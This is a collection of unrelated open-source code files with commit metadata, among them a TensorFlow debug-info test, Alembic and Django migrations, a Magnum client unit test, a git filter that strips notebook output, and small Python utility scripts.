-fred,jhseu/tensorflow,cxxgtxy/tensorflow,renyi533/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,arborh/tensorflow,sarvex/tensorflow,gautam1858/tensorflow,annarev/tensorflow,frreiss/tensorflow-fred,sarvex/tensorflow,frreiss/tensorflow-fred,xzturn/tensorflow,Intel-tensorflow/tensorflow,ppwwyyxx/tensorflow,yongtang/tensorflow,gunan/tensorflow,gunan/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,aam-at/tensorflow,gautam1858/tensorflow,adit-chandra/tensorflow,adit-chandra/tensorflow,ppwwyyxx/tensorflow,ppwwyyxx/tensorflow,xzturn/tensorflow,aam-at/tensorflow,frreiss/tensorflow-fred,paolodedio
s/tensorflow,annarev/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,ppwwyyxx/tensorflow,paolodedios/tensorflow,annarev/tensorflow,petewarden/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,xzturn/tensorflow,ppwwyyxx/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,xzturn/tensorflow,karllessard/tensorflow,freedomtan/tensorflow,petewarden/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,sarvex/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,yongtang/tensorflow,xzturn/tensorflow,Intel-tensorflow/tensorflow,aam-at/tensorflow,aam-at/tensorflow,petewarden/tensorflow,freedomtan/tensorflow,yongtang/tensorflow,aam-at/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,renyi533/tensorflow,frreiss/tensorflow-fred,tensorflow/tensorflow-pywrap_saved_model,aldian/tensorflow,cxxgtxy/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,freedomtan/tensorflow,aldian/tensorflow | tensorflow/compiler/mlir/tensorflow/tests/tf_saved_model/debug_info.py | tensorflow/compiler/mlir/tensorflow/tests/tf_saved_model/debug_info.py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# RUN: %p/debug_info | FileCheck %s
# pylint: disable=missing-docstring,line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from tensorflow.compiler.mlir.tensorflow.tests.tf_saved_model import common
class TestModule(tf.Module):
  """Minimal saved-model module used to exercise debug-info round-tripping."""

  @tf.function(input_signature=[
      tf.TensorSpec([], tf.float32),
      tf.TensorSpec([], tf.float32)
  ])
  def some_function(self, x, y):
    # The AddV2 op emitted for this addition is what the FileCheck line
    # below matches against (with a callsite pointing back at this file).
    return x + y
# Basic check that the debug info file is being correctly saved and loaded.
#
# CHECK: "tf.AddV2"{{.*}}callsite("{{[^"]*}}/debug_info.py":{{[0-9]+}}:{{[0-9]+}}
if __name__ == '__main__':
common.do_test(TestModule, show_debug_info=True)
| # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# RUN: %p/debug_info | FileCheck %s
# pylint: disable=missing-docstring,line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from tensorflow.compiler.mlir.tensorflow.tests.tf_saved_model import common
class TestModule(tf.Module):
@tf.function(input_signature=[
tf.TensorSpec([], tf.float32),
tf.TensorSpec([], tf.float32)
])
def some_function(self, x, y):
return x + y
# Basic check that the debug info file is being correctly saved and loaded.
#
# CHECK: "tf.AddV2"{{.*}}callsite("{{[^"]*}}/debug_info.py"
if __name__ == '__main__':
common.do_test(TestModule, show_debug_info=True)
| apache-2.0 | Python |
7b0005eb7d2b2e05a9fd833a2771573aec69c199 | Add script for comparing test vectors. | BBN-Q/QGL,BBN-Q/QGL | tests/compare_test_data.py | tests/compare_test_data.py | import os
import sys
import glob
import h5py
from QGL import *
import QGL
BASE_AWG_DIR = QGL.config.AWGDir
BASE_TEST_DIR = './test_data/awg/'
def compare_sequences():
    """Interactively compare each APS test sequence against the freshly
    compiled files under the AWG directory.

    For every test directory a comparison plot is shown and the user is
    prompted; entering 'q' stops the whole review.  (Bug fix: previously
    'q' used `break`, which only skipped to the next hardware type even
    though the prompt promised to quit.)
    """
    test_subdirs = ['TestAPS1', 'TestAPS2']
    for subdir in test_subdirs:
        testdirs = glob.glob(os.path.join(BASE_TEST_DIR, subdir, '*'))
        for test in testdirs:
            # build up subdirectory name
            _, name = os.path.split(test)
            testfiles = glob.glob(os.path.join(test, '*'))
            # recurse into single-child subdirectories
            while len(testfiles) == 1 and os.path.isdir(testfiles[0]):
                _, subname = os.path.split(testfiles[0])
                name = os.path.join(name, subname)
                testfiles = glob.glob(os.path.join(testfiles[0], '*'))
            newpath = os.path.join(BASE_AWG_DIR, subdir, name)
            print("{0} comparing to {1}".format(test, newpath))
            newfiles = glob.glob(os.path.join(newpath, '*'))
            PulseSequencePlotter.plot_pulse_files_compare(testfiles, newfiles)
            c = input('Enter to continue (q to quit)')
            if c == 'q':
                return  # bug fix: `break` only left the inner loop
def update_test_files():
    """Stamp every HDF5 file in the APS test-data tree with a
    'target hardware' attribute (needed by older files that predate it)."""
    for device in ['APS1', 'APS2']:
        testdirs = glob.glob(os.path.join(BASE_TEST_DIR, 'Test' + device, '*'))
        for test in testdirs:
            testfiles = glob.glob(os.path.join(test, '*'))
            # recurse into single-child subdirectories
            while len(testfiles) == 1 and os.path.isdir(testfiles[0]):
                testfiles = glob.glob(os.path.join(testfiles[0], '*'))
            for tfile in testfiles:
                fid = h5py.File(tfile)
                try:
                    fid['/'].attrs['target hardware'] = device
                finally:
                    # bug fix: the handle leaked if the attribute write raised
                    fid.close()
if __name__ == '__main__':
    # run the following line if you are comparing to older h5 files that don't
    # have the 'target hardware' attribute
    # update_test_files()
    # NOTE(review): output_file() is not defined in this module; presumably it
    # is re-exported by `from QGL import *` above -- confirm.
    output_file()
    compare_sequences()
| apache-2.0 | Python | |
bf9a5c6f14cfbafe544fcc27f146410afcc84fea | Add migrations for number_of_streams. | streamr/marvin,streamr/marvin,streamr/marvin | migrations/versions/19b7fe1331be_.py | migrations/versions/19b7fe1331be_.py | """Add number_of_streams to movies.
Revision ID: 19b7fe1331be
Revises: 2c76677d803f
Create Date: 2013-11-16 22:11:44.560000
"""
# revision identifiers, used by Alembic.
revision = '19b7fe1331be'
down_revision = '2c76677d803f'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Add movie.number_of_streams as a NOT NULL integer column."""
    ### commands auto generated by Alembic - please adjust! ###
    # server_default='0' lets existing rows satisfy the NOT NULL constraint.
    op.add_column('movie', sa.Column('number_of_streams', sa.Integer(), nullable=False, server_default='0'))
    ### end Alembic commands ###
def downgrade():
    """Reverse of upgrade(): drop movie.number_of_streams."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('movie', 'number_of_streams')
    ### end Alembic commands ###
| mit | Python | |
692f8ab50f4ecf8d40605d535e85077b8e79c510 | Add client test for test_pods | ramielrowe/python-magnumclient,ramielrowe/python-magnumclient,openstack/python-magnumclient | magnumclient/tests/v1/test_pods.py | magnumclient/tests/v1/test_pods.py | # Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import testtools
from testtools import matchers
from magnumclient.tests import utils
from magnumclient.v1 import pods
# Canned pod payloads that the fake Magnum API below serves to the tests.
POD1 = {'id': 123,
        'uuid': '66666666-7777-8888-9999-000000000000',
        'name': 'pod1',
        'desc': "desc",
        'bay_uuid': '5d12f6fd-a196-4bf0-ae4c-1f639a523a52',
        'images': ['image1', 'image2'],
        'labels': {'foo': 'bar'},
        'status': 'Running'
        }
POD2 = {'id': 124,
        'uuid': '66666666-7777-8888-9999-000000000001',
        'name': 'pod1',
        'desc': "desc",
        'bay_uuid': '5d12f6fd-a196-4bf0-ae4c-1f639a523a53',
        'images': ['image1', 'image2'],
        'labels': {'foo': 'bar'},
        'status': 'Running'
        }

# Body sent when creating a pod from a manifest URL.
CREATE_POD = {'pod_definition_url': 'file:///a/b.json'}

# Expected result of PATCHing POD1's description (see test_update below).
UPDATED_POD = copy.deepcopy(POD1)
NEW_DESCR = 'new-description'
UPDATED_POD['description'] = NEW_DESCR

# Route table for utils.FakeAPI: URL -> HTTP verb -> (headers, body).
fake_responses = {
    '/v1/pods':
    {
        'GET': (
            {},
            {'pods': [POD1, POD2]},
        ),
        'POST': (
            {},
            CREATE_POD,
        ),
    },
    '/v1/pods/%s' % POD1['id']:
    {
        'GET': (
            {},
            POD1
        ),
        'DELETE': (
            {},
            None,
        ),
        'PATCH': (
            {},
            UPDATED_POD,
        ),
    },
}
class PodManagerTest(testtools.TestCase):
    """Unit tests for PodManager driven by a canned FakeAPI (no real Magnum).

    Each test asserts both the HTTP calls recorded by the fake API and the
    objects the manager builds from the canned responses.
    """

    def setUp(self):
        super(PodManagerTest, self).setUp()
        self.api = utils.FakeAPI(fake_responses)
        self.mgr = pods.PodManager(self.api)

    def test_pod_list(self):
        # Renamed the local from `pods` to `pod_list`: the old name shadowed
        # the imported `pods` module inside this method.
        pod_list = self.mgr.list()
        expect = [
            ('GET', '/v1/pods', {}, None),
        ]
        self.assertEqual(expect, self.api.calls)
        self.assertThat(pod_list, matchers.HasLength(2))

    def test_pod_show(self):
        pod = self.mgr.get(POD1['id'])
        expect = [
            ('GET', '/v1/pods/%s' % POD1['id'], {}, None)
        ]
        self.assertEqual(expect, self.api.calls)
        self.assertEqual(POD1['name'], pod.name)
        self.assertEqual(POD1['desc'], pod.desc)

    def test_pod_create(self):
        pod = self.mgr.create(**CREATE_POD)
        expect = [
            ('POST', '/v1/pods', {}, CREATE_POD),
        ]
        self.assertEqual(expect, self.api.calls)
        self.assertTrue(pod)

    def test_pod_delete(self):
        pod = self.mgr.delete(POD1['id'])
        expect = [
            ('DELETE', '/v1/pods/%s' % POD1['id'], {}, None),
        ]
        self.assertEqual(expect, self.api.calls)
        self.assertIsNone(pod)

    def test_update(self):
        patch = {'op': 'replace',
                 'value': NEW_DESCR,
                 'path': '/description'}
        pod = self.mgr.update(id=POD1['id'], patch=patch)
        expect = [
            ('PATCH', '/v1/pods/%s' % POD1['id'], {}, patch),
        ]
        self.assertEqual(expect, self.api.calls)
        self.assertEqual(NEW_DESCR, pod.description)
| apache-2.0 | Python | |
3d10dd8b18096ba51ed4b837f8b297d015258a96 | Add conftest for UI testing | CodeForPhilly/chime,CodeForPhilly/chime,CodeForPhilly/chime | tests/dash_app/conftest.py | tests/dash_app/conftest.py | from pytest import fixture
from selenium.webdriver.chrome.options import Options
from dash_app import app
def pytest_setup_options():
    """Chrome options picked up by dash.testing: headless + CI-safe flags."""
    options = Options()
    options.add_argument('--disable-gpu')
    options.add_argument('--headless')
    options.add_argument("--no-sandbox")
    options.add_argument("--disable-extensions")
    return options


@fixture
def test_app(dash_duo):
    # Serve the Dash app on a test server and hand the dash_duo driver to
    # the test; teardown happens after the yield.
    dash_duo.start_server(app)
    yield dash_duo
| mit | Python | |
98213db5448f73edb039912bbdf6dd2f69ce26a4 | Add the migration. Oops. | quiltdata/quilt-compiler,quiltdata/quilt,quiltdata/quilt-compiler,quiltdata/quilt,quiltdata/quilt-compiler,quiltdata/quilt-compiler,quiltdata/quilt,quiltdata/quilt,quiltdata/quilt | migrations/versions/c3500625bed8_.py | migrations/versions/c3500625bed8_.py | """empty message
Revision ID: c3500625bed8
Revises: 3dcc171e7253
Create Date: 2017-02-21 16:08:43.397517
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = 'c3500625bed8'
down_revision = '3dcc171e7253'
branch_labels = None
depends_on = None
def upgrade():
    """Rename table `blob` to `instance` and the FK columns that point at it."""
    op.rename_table('blob', 'instance')
    # Keep the referencing columns in log/version/tag in sync with the rename.
    op.alter_column('log', 'blob_id', new_column_name='instance_id', existing_type=sa.BigInteger())
    op.alter_column('version', 'blob_id', new_column_name='instance_id', existing_type=sa.BigInteger())
    op.alter_column('tag', 'blob_id', new_column_name='instance_id', existing_type=sa.BigInteger())
def downgrade():
    """Reverse of upgrade(): restore the `blob` table and column names."""
    op.rename_table('instance', 'blob')
    op.alter_column('log', 'instance_id', new_column_name='blob_id', existing_type=sa.BigInteger())
    op.alter_column('version', 'instance_id', new_column_name='blob_id', existing_type=sa.BigInteger())
    op.alter_column('tag', 'instance_id', new_column_name='blob_id', existing_type=sa.BigInteger())
| apache-2.0 | Python | |
514f744bc39129a241e704e4ea282befcd31b1b7 | Add about page functional test | andela-kndungu/compshop,kevgathuku/compshop,andela-kndungu/compshop,andela-kndungu/compshop,kevgathuku/compshop,kevgathuku/compshop,kevgathuku/compshop,andela-kndungu/compshop | tests/functional/test_about_page.py | tests/functional/test_about_page.py | from .base import FunctionalTest
class AboutPageTest(FunctionalTest):
    """Browser test: the navbar's ABOUT US link leads to the About Us page."""

    def test_about_page_navigation(self):
        self.browser.get(self.live_server_url)
        self.browser.set_window_size(1024, 768)
        # NOTE(review): find_element_by_link_text / find_element_by_tag_name
        # were removed in Selenium 4 -- confirm the pinned selenium version
        # still provides them.
        about_link = self.browser.find_element_by_link_text('ABOUT US')
        about_link.click()
        # Assert that the About Us link in the navbar works
        self.assertIn("About Us", self.browser.title)
        self.assertEqual(self.browser.find_element_by_tag_name('h1').text, 'About Us')
| bsd-3-clause | Python | |
0e877e6124d370a0d628d12e387d5614ab4c6a6a | Create hacktorial.py | dhellen/Some-Math | hacktorial.py | hacktorial.py | #!/usr/bin/env python
# I got really excited about the recursive functions that come with Python
# Factorial
def factorial(z):
    """Return z! (the product 1*2*...*z).

    Bug fixes over the original:
    - z == 0 no longer crashes (reduce over an empty range raised TypeError);
      an initializer of 1 makes factorial(0) == 1, the mathematical value.
    - `reduce` is imported from functools and `range` replaces `xrange`, so
      the function runs on both Python 2.6+ and Python 3 with identical
      results.
    """
    from functools import reduce  # builtin in Py2, functools-only in Py3
    return reduce(lambda a, b: a * b, range(1, z + 1), 1)
# Some narrow functions as reference for broader functions:
''' A. The sum of squares is limited to only getting sums with exponent of 2,
so here is a function to calculate the sum (or series, really) of a power of
your choosing:'''
def series_of_powers(z, expo):
    """Return the sum of y**expo for y in 1..z (expo=2 gives the sum of squares).

    Portability fix: uses `range` and a generator expression instead of the
    Python-2-only `xrange` plus a temporary list; results are unchanged.
    """
    return sum(y ** expo for y in range(1, z + 1))
# B. Square of power of sums (or series, really):
def series_to_a_power(z, expo):
    """Return (1 + 2 + ... + z) raised to the power expo.

    Portability fix: `range` replaces the Python-2-only `xrange`; results
    are unchanged.
    """
    return sum(range(1, z + 1)) ** expo
''' I heard you liked functions, so I put a bunch of function parameters in
these function parameters, so you can pass functions to your functions.
'''
''' Operation of powers (think sum of squares, but it's any operation and any
exponent). I made xrange go backwards so that lambdas for subtracting and
dividing would make sense.
'''
def oppower(z, expo, alambdaorfunc):
    """Left-fold alambdaorfunc over [z**expo, (z-1)**expo, ..., 1**expo].

    The sequence is descending so subtraction/division folds read naturally,
    e.g. oppower(6, 2, lambda a, b: a - b) == 6**2 - 5**2 - ... - 1**2 == -19.
    Raises TypeError for z < 1 (empty sequence), as before.

    Portability fix: functools.reduce + range replace the Python-2-only bare
    `reduce`/`xrange`; results are unchanged.
    """
    from functools import reduce
    return reduce(alambdaorfunc, [y ** expo for y in range(z, 0, -1)])
''' For example:
oppower(6,2,lambda z,y: z-y)
produces 6**2 - 5**2 - 4**2 - 3**2 - 2**2 - 1**2, or -19
'''
''' Power of operations (think square of sums). Again, I made xrange go
backwards so that lambdas for subtracting and dividing would make sense.
'''
def powops(z, expo, alambdaorfunc):
    """Left-fold alambdaorfunc over z, z-1, ..., 1, then raise the result to expo.

    E.g. powops(4, 2, lambda a, b: a + b) == (4+3+2+1)**2 == 100.
    Raises TypeError for z < 1 (empty sequence), as before.

    Portability fix: functools.reduce + range replace the Python-2-only bare
    `reduce`/`xrange`; results are unchanged.
    """
    from functools import reduce
    return (reduce(alambdaorfunc, range(z, 0, -1))) ** expo
''' For example
powops(6,3,lambda z,y:z**y)
carries out ( (((((6**5)**4)**3)**2)**1) )**3, which is:
13628565259765240063307214694325589634102920113198019054884331531100689326724922
71228635903677560908387368131503998319547415800033207941032383559081748787333663
34155884618443998783841969103173072216240445102125485099344220416740519344692695
59871047548851882918239704585019039154176L
'''
''' It occurred to me as I was recording the example for powops() that factorial
is a bit limited. So, here is another function based on factorial that you can
customize. It differs from simply just a call to reduce(<function>, <sequence>)
because I set an xrange that goes backwards as the sequence for every call.
'''
def hacktorial(z, alambdaorfunc):
    """Generalized factorial: left-fold alambdaorfunc over z, z-1, ..., 1.

    hacktorial(z, lambda a, b: a * b) is the ordinary factorial; other
    callables fold the same descending sequence differently.
    Raises TypeError for z < 1 (empty sequence), as before.

    Portability fix: functools.reduce + range replace the Python-2-only bare
    `reduce`/`xrange`; results are unchanged.
    """
    from functools import reduce
    return reduce(alambdaorfunc, range(z, 0, -1))
| cc0-1.0 | Python | |
fb5a0d0cf9e3e14e418b06c373f26a2e6e2a7c1e | Read data from csv | liuisaiah/Hack-Brown2017,LWprogramming/Hack-Brown2017 | script.py | script.py | import numpy as np
import pandas
def main():
    """Load the sarcasm corpus and numerically encode its label columns in place."""
    # Fix: DataFrame.as_matrix() was removed in pandas 1.0; `.values` returns
    # the same ndarray and works on both old and current pandas.
    data = pandas.read_csv('sarcasm_v2.csv').values
    # print(data.shape)
    # Column 0: rhetorical category code (GEN/HYP/RQ) -> 0/1/2.
    data[:, 0] = np.array([find_category(x) for x in data[:, 0]])
    # Column 1: 'sarc'/'notsarc' -> 1/0.
    data[:, 1] = np.array([sarcasm(x) for x in data[:, 1]])
    # print(data[0,1]) # should be 1 for sarcasm
def find_category(category):
    """Map a rhetorical-category code to its integer label.

    Raises KeyError for any code other than GEN/HYP/RQ.
    """
    codes = {
        'GEN': 0,  # general
        'HYP': 1,  # hyperbole
        'RQ': 2,   # rhetorical question
    }
    return codes[category]
def sarcasm(sarcasm_value):
    """Map the sarcasm label 'sarc'/'notsarc' to 1/0.

    Raises KeyError for any other value.
    """
    labels = {'sarc': 1, 'notsarc': 0}
    return labels[sarcasm_value]
def get_data_index(ID):
    '''find the index of the data point. Corresponds to 1234 in GEN_sarc_1234 under ID in data.

    Implemented the TODO: the trailing underscore-delimited field of the ID
    is the numeric index.  Previously this function had no body and silently
    returned None.
    '''
    return int(ID.rsplit('_', 1)[-1])
if __name__ == '__main__':
main()
| mit | Python | |
350ea09999002935178bf6569411e56455167ff8 | add script to clean cells | adrn/DropOutput | drop_ipynb_output.py | drop_ipynb_output.py | #!/usr/bin/env python
"""
Suppress output and prompt numbers for IPython notebooks included in git
repositories.
By default, this script will tell git to ignore prompt numbers and
cell output when adding ipynb files to git repositories. Note that the
notebook files themselves are *not* changed, this script just filters
out the outputs before adding and committing with git.
This default behavior can be changed either on a notebook-by-notebook
basis, or for entire paths. To include output for a single notebook, modify
the metadata of the notebook (Edit -> Edit Notebook Metadata in the menu bar)
and add this:
"git" : { "suppress_output" : false }
to include output from that notebook. To include output for notebooks that
match a given glob pattern (e.g., for an entire path), you can create and
add paths to the file: ~/.config/git/clean_ipynb_ignore. For example, to
include output for all notebooks in ~/projects/notebooks that start with
"demo", add a line to the ignore file with:
~/projects/notebooks/demo*
See README.md for instructions on how to install this script.
"""
# Path to the ignore file
CLEAN_IPYNB_IGNORE_PATH = "~/.config/git/clean_ipynb_ignore"
# Standard library imports
import os
import sys
import json
import fnmatch
def dumpit(json_in):
    """Serialize the notebook JSON to stdout in a stable, git-friendly form."""
    json.dump(json_in, sys.stdout, sort_keys=True, indent=1, separators=(",", ": "))


# the git smudge filter will "cat" the notebook file contents and pipe in to this script
nb = sys.stdin.read()
json_in = json.loads(nb)

# we use the clean filter to pass the name of the file in to this script as a command-line argument
nb_filename = os.path.abspath(sys.argv[1])

# Honour the user's ignore file: a notebook matching a glob pattern (or living
# in a listed directory) is passed through untouched.
# bug fix: os.path.exists() was previously called on the un-expanded "~" path,
# so the ignore file was never found.
ignore_path = os.path.expanduser(CLEAN_IPYNB_IGNORE_PATH)
if os.path.exists(ignore_path):
    with open(ignore_path, "r") as f:
        for line in f:
            # bug fix: patterns previously kept their trailing newline, so
            # fnmatch could never match them.
            pattern = line.strip()
            if not pattern:
                continue
            # bug fix: os.path.dirname() was called with two arguments
            # (a TypeError); compare the notebook's directory to the listed
            # path, guarding samefile() against non-existent paths.
            in_ignored_dir = (os.path.exists(pattern) and
                              os.path.samefile(os.path.dirname(nb_filename), pattern))
            if fnmatch.fnmatch(nb_filename, pattern) or in_ignored_dir:
                # bug fix: previously the notebook was dumped here *and*
                # again (cleaned) below because the script did not stop.
                sys.stdout.write(nb)
                exit()

# get the metadata block of the notebook
metadata = json_in.get("metadata", dict())

# by default, suppress output and line numbers
suppress_output = True
# bug fix: this block referred to the undefined name `nb_metadata`.
git_meta = metadata.get("git", {})
if "suppress_outputs" in git_meta and not git_meta["suppress_outputs"]:
    suppress_output = False
# The module docstring documents the key as "suppress_output" (singular);
# accept that spelling as well.
if "suppress_output" in git_meta and not git_meta["suppress_output"]:
    suppress_output = False

# exit early and return the file as-is if we shouldn't filter output cells
if not suppress_output:
    sys.stdout.write(nb)
    exit()


def clean(cell):
    """ Remove the output from a cell and clear the execution count. """
    if "outputs" in cell:
        cell["outputs"] = []
    if "execution_count" in cell:
        cell["execution_count"] = None


for cell in json_in["cells"]:
    clean(cell)
dumpit(json_in)
| mit | Python | |
0bd974c21f42f7c2e0162b92ea1cde5ee5ff8060 | add wrapper to get all bootstrapped preds | judithfan/graphcomm,judithfan/graphcomm,judithfan/graphcomm | analysis/get_all_bootstrapped_model_predictions.py | analysis/get_all_bootstrapped_model_predictions.py | from __future__ import division
import os
import numpy as np
import pandas as pd
import analysis_helpers as h
'''
Wrapper around bootstrap_model_predictions.py.
It will spawn several threads to get bootstrap vectors from all splits and models.
Estimate uncertainty in estimates of key variables of interest that are derived from model predictions,
e.g., target rank, sketch cost. Estimate sampling uncertainty by resampling trials with replacement from the
test data set for each split, marginalizing out the parametric uncertainty (from param posterior).
Generate, for each model in model_space and each split_type in split_types, a boot_vec that is
nIter in length (nIter=1000), and can be used to estimate standard error both within split and to get
standard error estimate when combining across splits.
'''
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--nIter', type=int, help='how many bootstrap iterations?', default=1000)
args = parser.parse_args()
split_types = ['balancedavg1','balancedavg2','balancedavg3','balancedavg4','balancedavg5']
model_space = ['human_combined_cost','multimodal_fc6_combined_cost','multimodal_conv42_combined_cost',
'multimodal_fc6_S0_cost','multimodal_fc6_combined_nocost']
conditions = ['all','closer','further']
vois = ['target_rank','sign_diff_rank','cost']
nIter = args.nIter
print 'Now running ...'
for split_type in split_types:
for model in model_space:
for condition in conditions:
for var_of_interest in vois:
cmd_string = 'python bootstrap_model_predictions.py --split_type {} \
--model {} \
--condition {} \
--nIter {} \
--var_of_interest {}\
'.format(split_type,model,\
condition,nIter,\
var_of_interest)
print cmd_string
thread.start_new_thread(os.system,(cmd_string,)) | mit | Python | |
89464b86d3c94c5aea5aac15e0dc5b581ed2ac3f | Save olass/models/crud_mixin.py needs refactoring in order to have access to the `session` | ufbmi/olass-client,indera/olass-client | olass/models/crud_mixin.py | olass/models/crud_mixin.py | """
Goal: simplify the code when interacting with entities
"""
import sqlalchemy as db
class CRUDMixin():
    """ Helper class sqlalchemy entities """
    # NOTE(review): the save/delete methods below call `db.session`, but `db`
    # in this module is the plain `sqlalchemy` package (see the import above),
    # which has no `session` attribute.  As-is these methods raise
    # AttributeError; the mixin needs refactoring to gain access to a real
    # session (e.g. a Flask-SQLAlchemy `db` object) -- confirm intended design.
    __table_args__ = {'extend_existing': True}
    # Surrogate integer primary key shared by every entity using the mixin.
    id = db.Column(db.Integer, primary_key=True)

    @classmethod
    def get_by_id(cls, id):
        # Accept ints, floats, or digit-only strings; any other value
        # (including negative-number strings) yields None instead of a query.
        if any(
            (isinstance(id, str) and id.isdigit(),
             isinstance(id, (int, float))),):
            return cls.query.get(int(id))
        return None

    @classmethod
    def create(cls, **kwargs):
        """ Helper for session.add() + session.commit() """
        instance = cls(**kwargs)
        return instance.save()

    def update(self, commit=True, **kwargs):
        # Set each keyword argument as an attribute, then optionally persist.
        for attr, value in kwargs.items():
            setattr(self, attr, value)
        return self.save() if commit else self

    def save(self, commit=True):
        db.session.add(self)
        if commit:
            db.session.commit()
        return self

    def delete(self, commit=True):
        db.session.delete(self)
        # Returns the commit() result when committing, else False.
        return commit and db.session.commit()
| mit | Python | |
d445b65414325b9281ad6fcdc59ab4a2290d0bdc | Add missing migration | jonge-democraten/website,jonge-democraten/website,jonge-democraten/website,jonge-democraten/website | website/jdpages/migrations/0015_auto_20171209_1040.py | website/jdpages/migrations/0015_auto_20171209_1040.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: syncs the verbose_name / verbose_name_plural
    # Meta options of the jdpages page models with the model definitions.

    dependencies = [
        ('jdpages', '0014_organisationmember_email'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='blogcategorypage',
            options={'ordering': ('_order',), 'verbose_name': 'Blog categorie pagina', 'verbose_name_plural': "Blog categorie pagina's"},
        ),
        migrations.AlterModelOptions(
            name='homepage',
            options={'ordering': ('_order',), 'verbose_name': 'Home pagina', 'verbose_name_plural': "Home pagina's"},
        ),
        migrations.AlterModelOptions(
            name='organisationpage',
            options={'ordering': ('_order',), 'verbose_name': 'Organisatie pagina', 'verbose_name_plural': "Organisatie pagina's"},
        ),
        migrations.AlterModelOptions(
            name='organisationpartpage',
            options={'ordering': ('_order',), 'verbose_name': 'Organisatie-onderdeel pagina', 'verbose_name_plural': "Organisatie-onderdeel pagina's"},
        ),
        migrations.AlterModelOptions(
            name='visionpage',
            options={'ordering': ('_order',), 'verbose_name': 'Standpunt pagina', 'verbose_name_plural': "Standpunt pagina's"},
        ),
        migrations.AlterModelOptions(
            name='visionspage',
            options={'ordering': ('_order',), 'verbose_name': 'Standpunten pagina', 'verbose_name_plural': "Standpunten pagina's"},
        ),
        # NOTE(review): the plural below reads "Standpunt pagina's", which
        # looks like a copy-paste from visionpage ("Word lid pagina's" would
        # be expected).  The migration must mirror the model Meta, so verify
        # (and fix) the model first before touching this file.
        migrations.AlterModelOptions(
            name='wordlidpage',
            options={'ordering': ('_order',), 'verbose_name': 'Word lid pagina', 'verbose_name_plural': "Standpunt pagina's"},
        ),
    ]
| mit | Python | |
59e909afcb5dc5e44703c25d183b9edce60882b6 | add comment | NCSSM-CS/CSAssess,NCSSM-CS/CSAssess,NCSSM-CS/CSAssess,NCSSM-CS/CSAssess | controller/addComment.py | controller/addComment.py | #!/usr/local/bin/python3
"""
created_by: Aninda Manocha
created_date: 3/5/2015
last_modified_by: Aninda Manocha
last_modified date: 3/5/2015
"""
# imports
import constants
import utils
import json
from sql.session import Session
from sql.user import User
from sql.comment import Comment
#Format of comment -AM
#requestType: addComment
#answer: Answer
#content: "string"
def iChooseU(json):
    # Create a comment (authored by the requesting user) on the answer named
    # in the request payload, then echo a success response.
    # NOTE(review): the parameter name `json` shadows the imported json module
    # within this function.
    thisUser = utils.findUser(json)
    answer = json["answer"]
    # NOTE(review): `Answer` is never imported in this module (only Session,
    # User and Comment are) -- this line will raise NameError; confirm.
    theAnswer = Answer.get(answer["id"])[0]
    content = json["content"]
    # NOTE(review): `ACTIVE` is undefined here; presumably constants.ACTIVE.
    newComment = Comment.noID(None, thisUser, theAnswer, content, ACTIVE)
    newComment.add()
    return utils.successJson(json)
| mit | Python | |
